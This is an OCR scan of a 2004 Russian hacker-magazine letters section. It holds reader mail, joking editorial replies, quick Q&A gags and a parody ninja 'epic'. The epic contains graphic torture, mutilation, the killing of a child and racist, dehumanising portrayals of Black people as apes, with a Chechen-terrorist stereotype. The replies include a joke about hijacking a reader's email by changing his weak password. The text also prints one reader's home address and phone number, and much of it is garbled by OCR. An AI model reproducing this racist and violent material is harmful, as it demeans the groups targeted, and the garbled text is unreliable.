мер, я ужасно боюсь зубных врачей. Когда 
я представляю себе кресло, натянутую 
улыбку человека в белой маске и, что са- 
мое противное, работающую бормашину, 
меня начинает дико трясти. Вот ей-богу, не 
так страшно попасть в плен к чеченам, как 
засверлить одну «ма-а-аленькую» дырочку. 

Знаем мы их маленькую дырочку, блин. Я помню, как в детской поликлинике 
улыбчивая деваха положила мне дозу мышьяка, в три раза большую, чем надо, 
тем самым обеспечив мне бессонную ночь ;). С тех пор я подсел на мышьяк :). 
Еще я иногда панически боюсь того, что мой жесткий диск выйдет из строя. Вер- 
нее, я даже не боюсь, а каркаю. Потому что это так и происходит, причем в са- 
мый неподходящий момент. За это я уже не раз получал по башне от Симбиоза. 
И больше не хочу - больно бьет, свилога :(. 



О) N80 



9 каждого человека есть свой страх. Все чего-то боятся. Форбик, например, боится высоты, Хинт - зубных врачей. Уверен, что 
даже дядя Билли из конторы «Мелкософт» чего-то боится. А я вот очень боюсь симпатичных девушек в коротких юбках. Ты 
только представь: идешь себе темным переулком в час ночи, думаешь о всяких там агр-спуфингах, туннелировании трафика и 
ісшр-инкапсуляции, как вдруг замечаешь, что навстречу тебе идет пышногрудая девушка в мини-юбке. Причем юбка настолько 
сильно обтягивает ее стройную попку, что даже в условиях недостаточной видимости заметны контуры ее трусиков-танга, кото- 
рые так не любят носить девушки из-за того, что им не удобно в них ходить. Однако они все равно одевают их, чтоб выглядеть 
сексуально. И вот идет она и смотрит тебе прямо в глаза, и ты видишь в ее испепеляющем взгляде только одно: она хочет те- 
бя! Жутко, не правда ли? Кстати, если ты девушка и хочешь меня попугать - присылай фотки =). 







тіпгішОгк 



В моем возрасте юноши боятся разных вещей: армии, потери эрекции, увольнения с непыльной работы... Трусы! Жалкие трусы! Вот 
я не боюсь ни армии, ни импотенции. Меня пугает только синяя птица! Я не знаю, воробей это или синий страус, но одно я знаю 
точно: от синей птицы добра не жди. Обычно она является мне во сне и противно улыбается полным зубами ртом. У нее даже несет 
чем-то изо рта! Какими-то нечистотами. Синяя птица не имеет одной ноги, вместо нее - ржавый крюк. А из груди торчит страшная ра- 
на. При такой ране синяя птица не может жить, но она живет, что придает ей еще большей жугковатости. 

Опасайся синей птицы, мой юный друг, синяя птица всегда рядом. Она наблюдает за тобой. И ждет, когда ты сделаешь одну-единствен- 
ную ошибку, чтобы затем утащить тебя в Преисподнюю. 












письмо от: 



письмо от: 



МзОо531337 <МзОо531337@пагосІ.ги> 



Здравствуй, уважаемый журнал! 

Знаешь, если ты думаешь, что у тебя постоянный круг читателей, то ты глубоко 
ошибаешься. Я вот, например, читаю тебя уже год и некоторые моменты мне не- 
понятны. И таких как я большинство! Вы таких называете «Ламьем». Не скажу, что 
я великий хакер, но и не ламак виснугый. Если вас не затруднит, залейте в диск 
старые номера журнала. Обещаю, читатели будут довольны. 

Атак][акер-фарева! 

З.Ы Больше кодинга! Меньше рекламы! 

РОзвидания! • 



ответ к: 



Здравствуй, уважаемый читатель! 

Знаешь, мы не знаем и не думаем, что у нас постоянный круг читателей. Мы 
вообще ни о чем не думаем, если честно. Просто мы ненавидим ламье и ста- 
раемся его всячески изжить, оставляя непонятные моменты в журнале. 

А если серьезно, то рсІТ’ки с предыдущими номерами регулярно выкладыва- 
ются на диск, прилагаемый к журналу. Ты посмотри там внимательнее, 
авось, найдешь их. 

Хакер - форева, согласны. Он даже форева навсегда! 

З.Ы.: Больше кодинга сделать не можем, потому что Лозовский (ламак вис- 
нутый, кстати) устает. • 



@ 



письмо от: 



зат XXX <зат 999@таіІ.ги> 



ПРИВЕТ, великая и ужасная (но конечно всеми любима ) редакция. 

Конечно ваш жунал еть вэри гуд, но сейчас не об этом. Я хочу задать вопрос к то- 
му кто сейчас читает мое письмо. 

Вопрос: С чего ты начал свае изучение компа, на чем посоветуешь програмить 
(так-то я пытаюсь учить Реірііі) и еще я хотел спросить лично тебе что нравится 
больше І_іпих или ѴѴіп :(. 

Р. 5. посоветуй ушастому Хакеру, [спасибо что прочитал то что я наскорябол] • 



ответ к: 



Алоха, ушастый хакер! 

Я вот носатый хакер, кстати. Мы с тобой одной крови. Ты и я. Не знаю, как там 
начинают ушастые, но мы, носатые, начинали изучение всех прелестей компа 
с выбора коврика для мыши. Ведь чем круче задница на нем будет нарисова- 
на, тем больше тяга посидеть за компом и поизучать его устройство. 
Программить мы, как и все нормальные носатые хакеры, начинали на Коболе. 
Опять же, потому что его придумала попастая тетка, круто шарившая в лам- 
повых ЭВМ. Линукс и Виндовс нас не прут, однозначно. Предпочтение отда- 
ем РСЭОЗ’у, потому что он русский и бесплатный. 

[За сим писать кончаю. Спасибо, что «наскорябол» нам.] • 



АІех АІех <ргодгаттег1 23@гатЫег.ш> 



Я уже пол года читаю ваш журнал. Только не понял я 
одной такой хрени: в февральском номере быра реклама 
журнала ХАКЕР «ЖЕЛЕЗО»№0. Там еще говорилось про за- 
пись 1 Гб на один компакт. В магазинах и киосках этого вы- 
пуска я не нашел, и мало того, продавцы о нём ничего не 
слышали. Живу я в Самаре, и сами согласитесь, это неда- 
леко от Москвы. 

Скажите, пожалуйста, где можно заказать этот РАРИТЕТ- 
НЫЙ ВЫПУСК??????????? • 



ответ к: 



□ 



Хай, Алекс-Алекс! 

Честно говоря, мы были приятно удивлены, узнав, что ты 
из Самары, а не из Баден-Бадена! Полистали мы, значит, 
февральский номер, убедились, что там чего-то упоми- 
налось о «Железе» и одном гигабайте на компакте. Реши- 
ли поискать этот раритетный номер в палатках у метро, 
но все тщетно :(. 

Только вот продавцы почему-то крутили пальцами у вис- 
ка и мямлили нам что-то про сроки реализации фев- 
ральского товара и т.д. Мы так поняли, в общем, что 
всем захотелось запихать гиг инфы на диск, поэтому все 
номера раскупили очень быстро :(. • 



о 



письмо от: 



А <аѵІ@сот.теІз.ги> 



Здравствуйте, тадагіпе. 

Мой друг идиот, ему дали музыкальный диск. Он его отри- 
пировал ѴѴіпсІоѵѵз Месііа 9 и поставил встроенную в него за- 
щиту от копирования. Теперь песни в формате ѵѵпла. Каж- 
дый раз когда я переустанавливаю Винды и запускаю 
музыку открывается ссылка на МісгозоЙ и просит скачать 
лецензию. Это очень раздражает. Как можно снять защиту? 
И еще, вложите ли вы на ваш СР зегѵіз раск 2? • 



ответ к: 






Здорова, А! 

Твой друг - полнейший идиот! С этим не поспоришь! Кто 
же ставит защиту от копирования? Ведь после этого песни 
становятся в формате ѵѵта! Только идиот мог до такого до- 
думаться. Слушай, а может он тайный рекламный агент 
мелкомягких? Сделал диск в формате ѵѵта, а теперь у те- 
бя постоянно открывается сайт Микрософта. Странно все 
это... Ладно, ты пока разбирайся с другом, а мы пойдем 
писать на СО второй сервис-пак с защитой от установки 
(ну, чтобы постоянно на шѵшкер.ги закидывало). • 








письмо от: 



Привет! 



Покупаю Ваш журнал уже 3 года, никогда не был разочарован. Но на этот выпуск созрело много всего нехорошего:) 

Во-первых, хоть эти данные были строго секретны и только мне, я все-таки их разглашу:)... с августа будет П\Ю... Просто у меня нет ОѴО'шника и покупать его 
не собираюсь (скоро буду покупать ноут, а на мое старье ставить й\Ю - это трюк камикадзе:))), поэтому возношу к Вам мольбы: э-э-э... Плиз делайте хотя бы 
часть номера с СО. Можно сделать и 3 Сй (неплохо было бы...). Во-вторых, почему в том выпуске не 160, а 128 страниц?! Вы эти страницы компенсировали 
выпуском ШО-эксперта? Да нахрена сдался мне Ваш ШО-экперт!!! Уж лучше верните упущенные 42 страницы! Ну еще несколько замечаний: 

Ну в рубрике «Треп с читателями» есть вопросы повторяющиеся два раза. Р.5. такие херовины (имеется ввиду 2 аза повторить одно и тоже, к примеру в прош- 
лых выпусках в РАО) встречаются часто. Было бы неплохо, если бы Вы их убрали. Небольшая просьба: можно ли Вам в разделе Кодинг выкладывать статьи пос- 
вященные не только РНР, РегІ, С/С++, Реірііі, но и ѴізиаІВазіс? Просто я уже давно на нем програмирую и убедился в его не малых возможностях при правиль- 
ном подходе:) Сзади и с молотком. Почему снова убрали «Западлостроение»? Это была моя почти самая любимая рубрика. 

Лсава Кахеру!!! У сважением, ибіІМЮТ • 




ответ к: 









Доброе время суток, Ваня! Как ты там? Не хвораешь? И слава Богу. 

Прости, ничего поделать не можем, к сожалению. Журнал будет выпускаться исключительно с О МО, потому что фирмы-производители этих де- 
вайсов обещали нам золотые горы и кучу загорелых девах за то, что мы пересадим всех своих читателей на 0\Ю- при воды. Сам подумай, как бы 
ты на нашем месте поступил, если бы перед тобой стоял такой выбор? Ну ладно, это все лирика. Купишь себе МЭ-проигрыватель и будешь жить 
как все нормальные люди. Заодно и комп сменишь, потому что на твой старый ставить новый привод - трюк камикадзе. Смотри, какие мы нехо- 
рошие: мы еще и с производителями новых компьютеров договорились (за это нам тоже много чего обещали, кстати). Едем дальше, Вань. Сок- 
ращение журнала на 32 (да, именно на 32, потому что 160-128=32, а не 42:)) страницы произошло также неспроста. Ребята из «МЗ-эксперта» 
(который на хрен тебе не упал, как ты сказал) отбашляли нам неплохие премиальные за то, что мы пропиарили их журнал в своем издании. 
Как видишь, нами движет только желание нажиться и разбогатеть. По поводу «трепа» и «фака» могу так сказать: нам мало пишут, поэтому мы 
халтурим и повторяемся. ВБ мертв, посему писать о нем не станем. Учи Дельфи, брачо! 

Ну все, мне пора класть паркет в комнате, поэтому я сваливаю отсюда. Со Двидания! т 



о 



письмо от: 



РохЗІу <ТохзІу @ таі I . ги > 



Здраствуйте редакция журнала ][акер. пишу из городка шаты я больше чем 
уверин что все кто читает этот журнал не понимают про что читают, пишите про- 
ще для чайников какая программа нужна что куда нажимать и что будет если туда 
нажать, и если вы назыаетес ][акероті то ][акнете мой почтовый ящик 
к)Х5Іу@таіІ.ги и пришлите мне писмо на етот ящик с паролем. 

-Іпі7.Ет.ІіОі- • 



ІГ .0 



Дарова, ловкий лис. Или как там переводится твой ник? У тебя клас- 
сный городок, мы это сразу поняли. Ты абсолютно прав, что никто из чита- 
телей не понимает, о чем пишут наши авторы. Да что греха таить, даже у ре- 
дакторов аналогичная проблема. Поэтому начиная с октября журнал будет 
переименован в «4АіГНиК». Мы будем писать о том, какую кнопку на чайни- 
ке надо нажать, чтобы он вскипел. Что еще можно написать в журнале о чай- 
никах, мы пока не придумали, поэтому все статьи будут одинаковыми: «Как 
включить чайник?». 

Кстати, ты уверен, что пароль сігс - самый оптимальный для твоего ящика? 
Сорри, я так не думал и поменял его на более удачный. Поэтому отвечаю тебе 
на письмо в журнале, ведь на свой почтовый ящик ты больше не зайдешь ;(. т 



о 



письмо от: 



Оепіз <рІіегік@таіІ.ги> 



Здравствуйте. 



Впервые подписался на Ваш журнал. Получил июльский 
номер с двумя дисками, один из которых ( 2) не читается 
ни на одном компьютере. Меня это огорчает, раньше я по- 
купал Ваш журнал с вполне работоспособными дисками. 
Я хотел бы попросить Вас выслать мне именно этот диск 
(или хотя бы его копию). Заранее Вам благодарен. 

Мои координаты: 

Товбаз Денис Викторович 

680013 г. Хабаровск, ул. Лермонтова, д.31 , кв.51 • 




Привет, Денис. 

Это очень здорово, что ты подписался на наш журнал. 
И еще круче тот факт, что ты вообще получил июльский 
номер. Грех жаловаться-то, а? Ну не читается у тебя вто- 
рой диск - вставь первый! Не зря же по два рассылаем. 
Как маленький ты, ей-богу! Ладно, а теперь серьезно. 
Дело в том, что каждый десятый диск у нас бракованный. 
Это такая тактическая задумка, чтобы читатели нас не за- 
бывали и писали письма. Поздравляю, Денисыч, ты ров- 
но десятый! Шутки в сторону - бери багнутый диск и дуй 
к нам в редакцию. Ой... ты же не из Москвы. Свяжись 
тогда с нами по телефону 89037714241, и мы обо всем 
договоримся. Замену дискаты получишь, обещаю. А кое- 
кто получит по голове. За это тоже ручаюсь. • 






ИСТОРИЧЕСКИЙ ЭПОС 

в трех частях про 
славного ниндзю 

БУЯИДО-СПНП 




часть первпя: 

НИНДЗЯ В ПЛЕНУ 



Н индзю поймали. Злые самураи 

поставили капкан, и ниндзя Бучи- 
до-сан попал в него. К сожалению. 
Его били по почкам большими но- 
гами и приговаривали: «Будисяка 
знака кака самурака доставака». А 
ниндзя печально кивал: «Каюсяка 
каюсяка». А сам думал: «Вы мне, 
черти, ответите еще, точно вам говорю!». Нинд- 
зе выбили все зубы, сломали ногу, вывернули 
руку, отрубили левое ухо и выкололи правый 
глаз. Хотели еще палец отковырять, но пожале- 
ли - в тот день самураи были добрые. Они взва- 
лили бездыханную тушу на плечи и понесли во 
дворец к якудзе. Якудза давно хотел поймать 
бездыханного ниндзю. Ниндзя воровал его скот, 
грабил его богатства и насиловал его женщин. 
Вообще охренел ниндзя, как видите. И вот те- 
перь черный демон был у якудзы в плену. 

- Смеется тот, кто смеется, как я! - переина- 
чил якудза и рассмеялся над своей шуткой. - Са- 
мураи мои верные! - продолжил якудза. - Убейте 
его! Предварительно помучив. 

- Хорошо, якудза, - ответили самураи и обра- 
довались. Они были все живодерами с детства. 

Потащили самураи ниндзю в подвал и начали 
пытать. Засунули ниндзе в задницу сверло и на- 
чали сверлить. А в рот ниндзе засунули тоже 
сверло и тоже начали сверлить. А ниндзя знай 
себе без сознания, гад, валяется и ни фига боли 
не чует. Дали ему нашатыря, и он проснулся. 
Прикиньте, проснулся, а в попе сверло! Да еще и 
чего-то конечностей не хватает. 

- Ой! Где я? - спросил ниндзя Бучидо-сан. 

- А почему вы спрашиваете? - ответил жесто- 
кий самурай и ударил ниндзю самурайской шаш- 
кой по голове. 

- Дурак! Больно ведь, - укоризненно молвил 
ниндзя. 

- Терпи, солдат. Кто духом тверд - душою 
чист! - изрек мудрость самурай. 

- Да иди ты! - рассердился Бучидо-сан. 

Не выдержал самурай оскорблений и сказал: 

- Ты умрешь мучительно, презренный гад! 

А потом взял кипящее масло и полил ниндзе 
на темечко. А еще отпилил ему член пилочкой 
для ногтей. 

- Это подло! - кричал ниндзя. 

- И что? - пожал плечами самурай. 

- За это ты умрешь! - воскликнул ниндзя. 

- Не выйдет! Ты прикован к батарее! - возра- 
зил самурай. 

- А хрен ты угадал! - обрадовался ниндзя и 
продемонстрировал свободу рук. - Я постиг мас- 
терство распутывания пут еще в младенчестве. 
Меня такой фигней не возьмешь. 

- А почему ты тогда позволил мне отпилить те- 
бе член? 

- А зачем мне член? У меня есть энергия Цю. 
Бузю-Цю, понял? 

И ниндзя встал, воспрял и как вломил всем 
кренделей. Самураи удивиться не успели, как 
все умерли. И ниндзя пошел к якудзе. 

- Ты - мой враг! - сказал ниндзя. - Пришла 
твоя смерть. 

- Давай это обсудим? - предложил якудза. 



- Нет! - сказал ниндзя. - Кирдык тебе. Убью к чертям. Сволочь, мучил меня. 

- Нет. Я любил тебя как сына! 

- Правда? 

- Да. У тебя видишь татуировка на заду? 

- Да. Это у меня от папы. 

- Вот! - сказал якудза и показал такую же татуировку на заду. 

- Папа! 

- Сынок! 

И жили они долго и счастливо. 

часть вторая: 

пРЕдатЕаьствомаадшЕГОБРата 

Прошло три года и три ночи с тех пор, как ниндзе Бучидо-сану отпилили 
член пилочкой для ногтей. Постарел старый ниндзя Бучидо-сан, морщины 
сморщили его глаза, седины запорошили всю хрень на голове. А шрам на 
члене от коварной пилочки зарос хрупкой пленкой. Ниндзя практиковался в 
искусстве кунг-ху, но был он уже не тот. Ему давали кренделей все его уче- 
ники, били за то, что немощен он стал и не мог дать сдачи. 

Ниндзя жил во дворце умершего папы. Да, умер якудза. От рахита и пер- 
пендикулита. А еще у него был слабый кишечник. Бучидо-сан скучал по папе 
и горевал. Слезы текли из его глаз, но он мужественно сжимал кулаки. Он 
был ниндзя и нефиг. 

И вот однажды в дверь постучался стук. «Кто там за дверью?» - спросил 
Бучидо-сан. «Это я, младший сын якудзы пришел», - был ему ответ. 

Бросился ниндзя к двери и открыл ее радостно. Ибо там стоял его брат. 
Кровный родственник детства. Хоть и не помнил его ниндзя ни разу. 

- Здравствуй, брат! - сказал брат 

- Здравствуй, брат! - ответил брат. 

- Пожмем же руки, брат! - предложил брат. 

- Да, обнимемся! - брат ответил. 

- Я скучал по тебе, брат! - взгрустнул брат. 

- И я! - смахнул слезу брат. 

- Проходи брат. Я рад тебе! - брат молвил. 

- Теперь все будет хорошо! - обрадовался брат, вроде младший. 

И они сидели, пили чай и радовались. Потому что они любили друг друга. 
Они были братья. 

1 Ниндзя жил во дворце ^ 
умершего папы. Па, умер якудза. 

I От рахита и перпендикулита. • 

- Брат. Оставайся здесь. Будешь помогать мне по хозяйству. Мы будем 
любить друг друга и пить чай! - гостеприимничал старший брат. 

- Да, - кратко ответил брат. Он вообще был немногословен почему-то. 

И настала ночь. 

Вороны уснули в сенях, коровы тихо храпели. А луна светила свысока, ос- 
вещая картину Репина. Что это? Что это там такое в кустах, ответьте же мне! 
Это шорох там в кустах! И тут из кустов показалась тень. Еще одна тень. Еще 
много теней. Ничего себе, теней сколько! Харкнуть негде - теней понастави- 
ли. И тени бежали к замку. 

- Он там, - сказала тень. 

- Да. Там он, - ответила тень. 

- Мы убьем его! - сказала третья тень. 

- Мы сделаем это! - четвертая тень прохрипела. 

- Вперед! - позвала еще одна тень, и тени побежали. Гуськом. Они трени- 
ровались. 

Тени безжалостно убили копьями охрану и изнасиловали местных жен- 
щин. Сволочи!!! Как не стыдно? Но тени не знали стыда. Бесстыжие тени. 
Они ворвались в опочивальню ниндзи Бучидо-сана и схватили его. Стали ло- 
мать ему руки и ноги, отрывать яйца и мучить. Связали его, скрутили. Пина- 
ли и били, всячески издевались. Все было в крови и какахах. Но ниндзя тер- 
пел. 

- Я не скажу вам ничего. Можете меня убить! - кричал ниндзя, больше что- 
бы себя успокоить. 

- Увы, мой друг, увы. Убьем мы тебя в натуре. Заплатили нам. 

- Вы продажные твари! Подкупные ублюдки! Как не стыдно вам? Я жить 
хочу, вообще-то. Я дам вам больше! В десять раз! 

- Нет. Мы верные и честные убийцы, - тень сказала. - Меня Робин зовут. 

- А меня - Гут, - вторила ему другая тень. 
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КПКЕР/№09(69)/2004 



- Мы санитары леса! - сказали они хором. 

И они продолжили избивать ниндзю. 

Но тут произошел «о ужас»! Дверь в опочиваль- 
ню открылась, и в нее вошел... Кто это? БРАТ! Он 
смеялся своими зубами и радовался. 

- Не брат ты мне! - сказал небрат и рассмеялся 
еще больше. 

- Убей меня! Убей! Я не хочу жить. Такое преда- 
тельство. За что мне это? За что? - взывал ниндзя 
к Аллах Акбару, но тот его не слышал. 

- Меня зовут Услан Бэк Али Брахмат. Я чеченс- 
кий террорист. Сдавайся! - пригрозил небрат. 

- Нет. Я не сдамся. Я буду сражаться до конца! 
- прошептал лопнувшими губами полумертвый Бу- 
чидо. 

- Тогда тебе хэндыхох. 

- Это мы еще посмотрим. 

Ниндзя нажал себе на четвертую точку на треть- 
ем пальце ноги второй точкой шестого пальца ру- 
ки, и к нему вернулась энергия Цю. Она пропитала 
его тело и дала ему мощь. И ниндзя стал суперни- 
ндзей. Он стал летать и уклоняться от пуль. А на 
груди у него был значок «Нео». Ниндзя раздал всем 
кренделей, убил небрата и пошел пить чай в гор- 
дом одиночестве. На душе у него скрипели тучи. 



Ниндзя прознал про негров и достал свой меч. 
То был меч сенсея, которым он убил сенсея. Гово- 
рил слишком много сенсей. Непонятного. 

Вышел Бучидо-сан на чудную террасу, глянул в 
армейский бинокль и тяжко вздохнул. Кругом бы- 
ло море. Черное море черных людей. Негры пели 
песни и галдели, а еще стреляли из луков. 

- Ложись, сынок! - успел крикнуть ниндзя. 

Но сын и без соплей уже лежал. Ему простре- 
лили обе ноги, и сын истекал кровью. 

- Сволочи! - кричал ниндзя. - Вы поплатитесь! - 
кричал ниндзя. - Уроды, в сына попали! - кричал 
ниндзя. 

- Да, папа, да! Мочи сук! - истекая кровью, 
шептал сын. 

- Как ты посмел материться в присутствии от- 
ца? - грозно молвил отец. И дал сыну кренделей 
по попе карандашиком. 

А негры все наступали. 

Они прорвали оборону и теперь были близко. 

Можно было услышать, как воняют их носки. 
Как же воняют их носки, Господи! 

- Сын. Лежи здесь, а я пойду тебя защищать. И не 
заляпай мне персидский ковер своей чумазой кровью. 
Убью! - молвил папа и решительно побег в атаку. 



Прошло пять лет с тех пор, 
как ниндзе Бучидо-сану отпилили член 
пилочкой для ногтей. 



часть третья: атака негров из 
африканских джунглей 

Прошло пять лет с тех пор, как ниндзе Бучидо-са- 
ну отпилили член пилочкой для ногтей. Шрам от 
пилочки уже так зарос членной коркой, что самого 
ниндзю не было видно. Ах да, у ниндзи родился 
сын. Степаном звать. Бучидосановичем. Степан 
стал упитанным малым, писал в меру, гадил куда 
велено, говорил по понятиям. Отец любил сына 
как дочь. Сын любил отца. Образцовая, стало 
быть, семейка. 

Ниндзя стал огородником и выращивал бакла- 
жаны. Он из них гнал самогон и пил его ведрами. 
А потом избивал сына, хоть и любил сына. Он 
просто был пьяный на голову и думал, что так и 
надо. А ребенок плакал. Ибо били его ногами по 
лицу и сковородкой по половым органам. Я бы то- 
же от такого плакал, ничего себе. 

Ах да, у сына ведь была мама. Но не стало ма- 
мы. Куда-то исчезла мама. Звали маму, но не вер- 
нулась мама. Убежала в туман, наверное. 

Итак, негры. 

Негры замыслили план. Они решили убить 
ниндзю. И съесть его сердце, чтобы освоить кунг- 
ху. Их так учил шаман, и они ему верили. Потому 
что шаман носил синий тюрбан, как ему не ве- 
рить? 

Негры спилили джунгли и сделали луки. А по- 
том поплыли на байдарках через океан в страну 
солнца и восходящих. 

Долго плыли негры, устали. Ни фига себе, 
столько грести! Пятьдесят тысяч километров! Но 
догребли. Обезьяны, что с них взять... 

Они вышли на японаматьземлю, разожгли кос- 
тер и стали прыгать хороводы, галдеть песни. Так 
они показывали, что теперь всем труба. Особенно 
ниндзе. 



Но негров было слишком много. Одни сплош- 
ные негры цвета черной-пречерной чернотины. И 
все с черными луками. И все стреляют по-черно- 
му. И у всех носки. Тоже черные. 

- Что вы от нас хотите, злые вы негры? - спро- 
сил ниндзя. 

И тогда вышел главный негр в самых дорогих 
носках. 

- Мы хотим твое сердце! 

- Как так? А я как? 

- А ты умрешь. Так как не сможешь жить без 
сердца. 

- Но я не хочу умирать! Я уже говорил во второй 
серии. 

- Тогда отдай сердце своего сына. Мы съедим 
его и будем знать кунг-ху. 

- Вот это другое дело. 

И ниндзя пошел к сыну. 

- Папа, мы победили? - с надеждой спросил 
Степан. 

- Да, сынок. Я так тебя люблю! 

- Я тоже люблю тебя, папа! - заплакал сын. 

И тогда ниндзя достал нож и всадил его в череп 
сыну. А потом выковырял сердце и отнес главному 
негру. 

- Бери. Для хорошего человека не жалко. 

И негр съел сердце. И познал тайны кунг-ху. 

- Прощай, ниндзя. Мы будем слагать о тебе на- 
родные эпосы! - обнял ниндзю негр. 

- Идите, идите, товарищ! - сказал ниндзя и по- 
шел к сыну. 

Сын лежал на бетоне весь в крови и какахах. Он 
был тяжело ранен и стонал. 

- Держись, сынок! Мы еще с тобой порыбачим! 
- оптимистично молвил ниндзя и стал делать иску- 
сственное дыхание. Но мальчик умер от отравле- 
ния. Он днем накануне скушал несвежий сыр. 

- Жаль, - расстроился Бучидо-сан и закопал сына. 

А негры уплыли. 
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и- Цто нового будет в спедующен н омере? 






Я пришел к тебе с приветом, с утюгом и пистолетом! 
Испугался я тебя, убежал скорей в кусты! Раз-два- 
три-четыре-пять, с детства с рифмой я дружу! 

Привет! А правда, что Клуниз - продукт генетики, Бублик 

- прототип колобка, у Симбиозиса косматая грива, Никитос 

- немец, а Куттер - негр? 

И! Враки! Симбиозис подстригся уже! 

І_атега - тизШАі! Вуіегггпіе ргодгаттегі - Тогеѵег! 

Вгаі, іу пе ргаѵ, Ьгаі! 2а4ет Хэк падоѵагіѵаі па роізапоѵ! Ту 
роіаіеі тоіезЫ 

Мой хард кашляет и чихает. Сколько ему осталось жить? 
К! А у него СПИД! Значит, он умрет! (с) 

Спасибо за журнал. Подтереться смог. 

Ты молодец. Ты СМОГ подтереться! Глянцевой бумагой : 



Ч Ні! Тезі. 

К! Ні! ВООЫік. 

Вазап! Чьи ножки на обложке? 

Есть разница? Чтоб любить эти ноги, нужен белый ка- 
диллак... (с) 

Сколько надо онанировать для наполнения десятилитро- 
вого ведра, если онанирует импотент? 

Сложный вопрос. Необходимо собрать консилиум. 

А девушки бывают хакерами? 

А коровы бывают умными? 

А че у вас в редакции одни парни? 

Я это Апокиной передам. Она тебя за парня съест :). 

Йо! Как делишки? Как детишки? Еду в поезде, чем за- 
няться? 



Что делать, если мой хомяк сдох? 



Ні Сдохнуть вместе с ним, имхо. 



Подскажите, как избавиться от онанизма? Я серьезно! 

Мы, онанисты, - народ мускулистый! Нас не заманишь 
сиськой мясистой! Зачем избавляться от онанизма, амиго? =) 

Я нашел в лесу косу, порубил всех в колбасу. И теперь в 
моем селе все в кровище и дерьме. 

Из серии «Я узнал, что у меня есть огромная семья»? 

Классный у вас журнал! Им дрова в бане сразу разжига- 
ются! 

А мы его обычно используем в качестве мухобойки, пото- 
му как он увесистый. 



И:Дунаю,етоит. Он же твой друг, да? 
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Как вы думаете, мне стент сломать ящик друга? 



Сколько пива вы выпиваете в день? =) 

Пицот! 

В июльском номере второй диск оказался погнутым! Кто 
на нем сидел? 

А мы-то все думали, почему у Лозовского на правой яго- 
дице две концентрические окружности выдавлены... 

Люди! Я дурак, что делать? 

Эволюционируй в имбецила. 

Ч: Как получить доступ к чужому мылу, зная только логин? 
Узнав пасс к этому логину. Логично? 

Че за глючный чувак на обложке июльского номера? Он 
че, носки сжег? 

Нет, у него ремень утонул. 

Куттер, поздравляю с новой должностью! 

Кстати, Вань, присоединяемся :). 

К! Я не хочу покупать дебильный журнал «Браво» из-за Ше- 
повалова! 

К! Не умеешь - научим. Не хочешь - заставим. 

Печатайте больше голых теток!!! 

Ага, «Взлом» урежем до трех полос, а остальное под го- 
лых теток отдадим. 

Дайте имя какого-нибудь прокси! 

256.13.265.1 - давай дадим ему имя «Алексей»? 

Где можно приобрести журнал «Железо» в Новосибирске? 
Там в Пашино есть недалеко от «Русича» «Союзпечать». 

С «Плахи» на 27 автобус садись и до конечки пили. 



Ні Займись делишками - делай детишек. 

Привет! Я взломал ваш сайт! Только не пугайтесь! Шутка! 
Ні Дочитали до середины СМС - Форб от страха в штаны 
наложил. Прочитали концовку - штаны отстирали. 

Привет! Ты увлекаешься с розовыми? 

Нет, я с ними работаю. 

А вы лошадьми не торгуете? 

Торгуем. И ослами торгуем. И пони продаем. И кузнечи- 
ками барыжим. 

Вставай, петушок! =) 

Хи нт, ты дурак! =) 

Хакер - это круто! Хакер - это класс! Не было бы хакера - 
не было бы нас! 

Стихоплюй, блин. 

Гы гы пук... Гы пук... Ой, педрючит жутко... 

Мы в детстве таких, как ты, пинали, пока не засвистят :). 
Хочу задать дельный вопрос. Почему товарищ Бублик не 
отмечен в списке состава редакции? 

Ні Кстати, дело говорит парень! 

Хочу прогу, которая ломает все проги! 

Ні Разделимся: ты ищешь эту прогу, а я ищу кряк к ней. 



Эпнпот 
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Ничего лишнего 

ЗупсМазіег 173Р - монитор 
без кнопок на передней панели 





□гдііАІІ минилшлияѵ Монитор ЕупсМаіІвг 17ЭР настолько соверши нвн, что кнопки были бы 
лишними Программное обеспечение Балпвопд Мадю Типв'“ яоэвопнвт выпйлллтъ пев настройки океана 
с помощью мыши Упьтрдтонкии экра« толщиной всего 2 т ВрйщНГСй на и прекрасно счотрнтср 
в пч>бом- ракурсе. Неудивительно, «о Затвипд йММТСй обладатвпом 67 международные наград за дизайн. 
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